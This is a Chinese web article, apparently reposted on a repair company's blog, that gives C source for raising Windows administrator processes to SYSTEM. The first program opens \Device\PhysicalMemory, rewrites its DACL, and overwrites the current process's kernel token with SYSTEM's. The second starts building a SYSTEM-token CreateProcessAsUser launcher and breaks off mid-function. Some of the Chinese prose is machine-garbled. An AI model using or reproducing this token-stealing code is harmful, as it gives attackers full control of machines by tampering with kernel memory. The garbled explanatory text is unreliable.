管理员组获取系统权限的完美解决方案
{
goto CleanUp;
}
ZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
ea.grfAccessPermissions = SECTION_MAP_WRITE;
ea.grfAccessMode = GRANT_ACCESS;
ea.grfInheritance= NO_INHERITANCE;
ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME;
ea.Trustee.TrusteeType = TRUSTEE_IS_USER;
ea.Trustee.ptstrName = "CURRENT_USER";
if(dwRes=SetEntriesInAcl(1,&ea,pDacl,&pNewDacl)!=ERROR_SUCCESS)
{
goto CleanUp;
}
if(dwRes=SetSecurityInfo(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,NULL,NULL,pNewDacl,NULL)!=ERROR_SUCCESS)
{
goto CleanUp;
}
CleanUp:
if(pSD)
LocalFree(pSD);
if(pNewDacl)
LocalFree(pNewDacl);
}
HANDLE OpenPhysicalMemory()
{
NTSTATUS status;
UNICODE_STRING physmemString;
OBJECT_ATTRIBUTES attributes;
RtlInitUnicodeString( &physmemString, L"\\Device\\PhysicalMemory" );
attributes.Length = sizeof(OBJECT_ATTRIBUTES);
attributes.RootDirectory = NULL;
attributes.ObjectName = &physmemString;
attributes.Attributes = 0;
attributes.SecurityDescriptor = NULL;
attributes.SecurityQualityOfService = NULL;
status = ZwOpenSection(&g_hMPM,SECTION_MAP_READ|SECTION_MAP_WRITE,&attributes);
if(status == STATUS_ACCESS_DENIED){
status = ZwOpenSection(&g_hMPM,READ_CONTROL|WRITE_DAC,&attributes);
SetPhyscialMemorySectionCanBeWrited(g_hMPM);
CloseHandle(g_hMPM);
status =ZwOpenSection(&g_hMPM,SECTION_MAP_READ|SECTION_MAP_WRITE,&attributes);
}
if( !NT_SUCCESS( status ))
{
return NULL;
}
g_pMapPhysicalMemory = MapViewOfFile(
g_hMPM,
4,
0,
0x30000,
0x1000);
if( g_pMapPhysicalMemory == NULL )
{
return NULL;
}
return g_hMPM;
}
PVOID LinearToPhys(PULONG BaseAddress,PVOID addr)
{
ULONG VAddr=(ULONG)addr,PGDE,PTE,PAddr;
if(VAddr>=0x80000000 && VAddr<0xa0000000)
{
PAddr=VAddr-0x80000000;
return (PVOID)PAddr;
}
PGDE=BaseAddress[VAddr>>22];
if ((PGDE&1)!=0)
{
ULONG tmp=PGDE&0x00000080;
if (tmp!=0)
{
PAddr=(PGDE&0xFFC00000)+(VAddr&0x003FFFFF);
}
else
{
PGDE=(ULONG)MapViewOfFile(g_hMPM, FILE_MAP_ALL_ACCESS, 0, PGDE & 0xfffff000, 0x1000);
PTE=((PULONG)PGDE)[(VAddr&0x003FF000)>>12];
if ((PTE&1)!=0)
{
PAddr=(PTE&0xFFFFF000)+(VAddr&0x00000FFF);
UnmapViewOfFile((PVOID)PGDE);
}
else return 0;
}
}
else return 0;
return (PVOID)PAddr;
}
ULONG GetData(PVOID addr)
{
ULONG phys=(ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory,(PVOID)addr);
PULONG tmp=(PULONG)MapViewOfFile(g_hMPM, 4, 0, phys & 0xfffff000, 0x1000);
if (tmp==0)
return 0;
ULONG ret=tmp[(phys & 0xFFF)>>2];
UnmapViewOfFile(tmp);
return ret;
}
BOOL SetData(PVOID addr,ULONG data)
{
ULONG phys=(ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory,(PVOID)addr);
PULONG tmp=(PULONG)MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000);
if (tmp==0)
return FALSE;
tmp[(phys & 0xFFF)>>2]=data;
UnmapViewOfFile(tmp);
return TRUE;
}
DWORD MyGetModuleBaseAddress( char * pModuleName)
{
PSYSTEM_MODULE_INFORMATION pSysModule;
ULONG uReturn;
ULONG uCount;
PCHAR pBuffer = NULL;
PCHAR pName = NULL;
NTSTATUS status;
UINT ui;
CHAR szBuffer[10];
DWORD pBaseAddress;
status = ZwQuerySystemInformation( SystemModuleInformation, szBuffer, 10, &uReturn );
pBuffer = ( PCHAR )malloc(uReturn);
if ( pBuffer )
{
status = ZwQuerySystemInformation( SystemModuleInformation, pBuffer, uReturn, &uReturn );
if( NT_SUCCESS(status) )
{
uCount = ( ULONG )*( ( ULONG * )pBuffer );
pSysModule = ( PSYSTEM_MODULE_INFORMATION )( pBuffer + sizeof( ULONG ) );
for ( ui = 0; ui < uCount; ui++ )
{
pName = strstr( pSysModule->ImageName, pModuleName );
if( pName )
{
pBaseAddress = (DWORD)pSysModule->Base;
free( pBuffer );
return pBaseAddress;
}
pSysModule ++;
}
}
free( pBuffer );
}
return NULL;
}
DWORD GetEprocessFromId (DWORD PID)
{
NTSTATUS status;
PVOID buf = NULL;
ULONG size = 1;
ULONG NumOfHandle = 0;
ULONG i;
PSYSTEM_HANDLE_INFORMATION h_info = NULL;
DWORD n;
DWORD retvalue=0;
buf=malloc(0x1000);
if(buf == NULL)
{
printf("malloc wrong\n");
return FALSE;
}
status = ZwQuerySystemInformation( SystemHandleInformation, buf, 0x1000, &n );
if(STATUS_INFO_LENGTH_MISMATCH == status)
{
free(buf);
buf=malloc(n);
if(buf == NULL)
{
printf("malloc wrong\n");
return FALSE;
}
status = ZwQuerySystemInformation( SystemHandleInformation, buf, n, NULL);
}
else
{
printf("ZwQuerySystemInformation wrong\n");
return FALSE;
}
NumOfHandle = *(ULONG*)buf;
h_info = ( PSYSTEM_HANDLE_INFORMATION )((ULONG)buf+4);
for(i = 0; i
if( h_info[i].ProcessId == PID &&( h_info[i].ObjectTypeNumber == 5 ))
{
retvalue=(DWORD)(h_info[i].Object);
break;
}
}
if ( buf != NULL )
{
free( buf );
}
return retvalue;
}
void usage(char *exe)
{
printf("Usage : %s [exefile|-h]\n");
}
int main(int argc, char **argv)
{
HMODULE hDll;
DWORD tmp;
DWORD SystemEprocess;
DWORD SystemEprocessTokenValue;
DWORD CurrentEprocess;
DWORD CurrentEprocessTokenValue;
printf("\nIt is intended to get SYSTEM privilege from administrators group.\n");
printf("\tMade by ZwelL.\n");
printf("\tZwell@sohu.com.\n");
printf("\thttp://www.donews.net/zwell.\n");
printf("\tType -h to get more information\n", argv[0]);
if( argc>=2)
{
if(
( (strcmp(argv[1],"-h")==0) && (argc==2))
|| (argc>2)
)
{
usage(argv[0]);
exit(-1);
}
}
if (!InitNTDLL())
{
printf("InitNTDLL wrong\n");
exit(-1);
}
if (OpenPhysicalMemory()==0)
{
printf("OpenPhysicalMemory wrong\n");
exit(-1);
}
hDll = LoadLibrary("ntoskrnl.exe");
tmp = (DWORD)GetProcAddress(hDll, "PsInitialSystemProcess");
tmp=MyGetModuleBaseAddress("ntoskrnl.exe")+(DWORD)tmp-(DWORD)hDll;
SystemEprocess=GetData((PVOID)tmp);
tmp=SystemEprocess+TOKEN_OFFSET; //SYSTEM's Token address
SystemEprocessTokenValue=GetData((PVOID)tmp); //SYSTEM's Token
printf("System Process Token : 0x%08X\n", SystemEprocessTokenValue);
OpenProcess( PROCESS_ALL_ACCESS,FALSE,GetCurrentProcessId() );
CurrentEprocess = GetEprocessFromId(GetCurrentProcessId());
CurrentEprocessTokenValue = GetData((PVOID)(CurrentEprocess+TOKEN_OFFSET));
printf("Current EPROCESS : %08x\n", CurrentEprocess);
printf("Current Process Token : %08x\nPress ENTER to continue...\n",
CurrentEprocessTokenValue);
//getchar();
SetData((PVOID)(GetEprocessFromId(GetCurrentProcessId())+TOKEN_OFFSET), SystemEprocessTokenValue);
printf("Current Process Token : %08x\n",
GetData((PVOID)(GetEprocessFromId(GetCurrentProcessId())+TOKEN_OFFSET)));
printf("Press ENTER to create process...\n");
//getchar();
if( GetData((PVOID)(CurrentEprocess+TOKEN_OFFSET))
== GetData((PVOID)(SystemEprocess+TOKEN_OFFSET))
)
// It is so surprised that SYSTEM's Token always in changing.
// So before create new process, we should ensure the TOKEN is all right
{
ShellExecute(NULL, "open", (argc==2)?argv[1]:"c:\\windows\\regedit.exe", NULL, NULL, SW_SHOWNORMAL);
}
UnmapViewOfFile(g_pMapPhysicalMemory);
CloseHandle(g_hMPM);
CloseNTDLL();
return 0;
}
在上面的代码中,请将TOKEN_OFFSET改成你的体系版本的偏移值.我们也可以想像到由于是操作了体系的内核空间,搞欠好会呈现蓝屏现象(只管机率很小).
=========================================================================================================
第二种要领,我们不本身创立进程,而是间接用System进程的Token来创立进程.看到这,大家大概又想到了远线程。
这里不是。我的思路是:设置装备摆设好桌面(desktop),工作区间(WindowStation)等信息,最后调用CreateProcessAsUser来创立子进程。
用这种要领极为稳定。这里一些关于获取SID的代码可以看我前一段工夫写的"一种新的穿透防火墙的数据传输技术".
下面是源代码,这段代码也完成了RUNAS的功能,有兴味可以研究一下,大部分都来自MSDN:
#include
#include
#include
#include
#include
#include
#pragma comment(lib, "wtsapi32")
HANDLE OpenSystemProcess()
{
HANDLE hSnapshot = NULL;
HANDLE hProc = NULL;
__try
{
// Get a snapshot of the processes in the system
hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hSnapshot == NULL)
{
printf("OpenSystemProcess CreateToolhelp32Snapshot Failed");
__leave;
}
PROCESSENTRY32 pe32;
pe32.dwSize = sizeof(pe32);
// Find the "System" process
BOOL fProcess = Process32First(hSnapshot, &pe32);
while (fProcess && (lstrcmpi(pe32.szExeFile, TEXT("SYSTEM")) != 0))
fProcess = Process32Next(hSnapshot, &pe32);
if (!fProcess)
{
printf("OpenSystemProcess Not Found SYSTEM");
__leave; // Didn't find "System" process
}
// Open the process with PROCESS_QUERY_INFORMATION access
hProc = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE,
pe32.th32ProcessID);
if (hProc == NULL)
{
printf("OpenSystemProcess OpenProcess Failed");
__leave;
}
}
__finally
{
// Cleanup the snapshot
if (hSnapshot != NULL)
CloseHandle(hSnapshot);
return(hProc);
}
}
BOOL EnablePrivilege (PCSTR name)
{
HANDLE hToken;
BOOL rv;
TOKEN_PRIVILEGES priv = { 1, {0, 0, SE_PRIVILEGE_ENABLED} };
LookupPrivilegeValue (
0,
name,
&priv.Privileges[0].Luid
);
OpenProcessToken(
GetCurrentProcess (),
TOKEN_ADJUST_PRIVILEGES,
&hToken
);
AdjustTokenPrivileges (
hToken,
FALSE,
&priv,
sizeof priv,
0,
0
);
rv = GetLastError () == ERROR_SUCCESS;
CloseHandle (hToken);
return rv;
}
#define chDIMOF(Array) (sizeof(Array) / sizeof(Array[0]))
BOOL ModifySecurity(HANDLE hProc, DWORD dwAccess)
{
PACL pAcl = NULL;
PACL pNewAcl = NULL;
PACL pSacl = NULL;
PSID pSidOwner = NULL;
PSID pSidPrimary = NULL;
BOOL fSuccess = TRUE;
PSECURITY_DESCRIPTOR pSD = NULL;
__try
{
// Find the length of the security object for the kernel object
DWORD dwSDLength;
if (GetKernelObjectSecurity(hProc, DACL_SECURITY_INFORMATION, pSD, 0,
&dwSDLength) || (GetLastError() != ERROR_INSUFFICIENT_BUFFER))
{
printf("ModifySecurity GetKernelObjectSecurity Size Failed");
__leave;
}
// Allocate a buffer of that length
pSD = LocalAlloc(LPTR, dwSDLength);
if (pSD == NULL)
{
printf("ModifySecurity LocalAlloc Failed");
__leave;
}
// Retrieve the kernel object
if (!GetKernelObjectSecurity(hProc, DACL_SECURITY_INFORMATION, pSD,
dwSDLength, &dwSDLength))
{
printf("ModifySecurity GetKernelObjectSecurity Failed");
__leave;
}
// Get a pointer to the DACL of the SD
BOOL fDaclPresent;
BOOL fDaclDefaulted;
if (!GetSecurityDescriptorDacl(pSD, &fDaclPresent, &pAcl,
&fDaclDefaulted))
{
printf("ModifySecurity GetSecurityDescriptorDacl Failed");
__leave;
}
- 文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。
TAG:
|
评论加载中...
|
上一篇: 打造安全的Windows 2003系统
下一篇: 用自解压包入侵
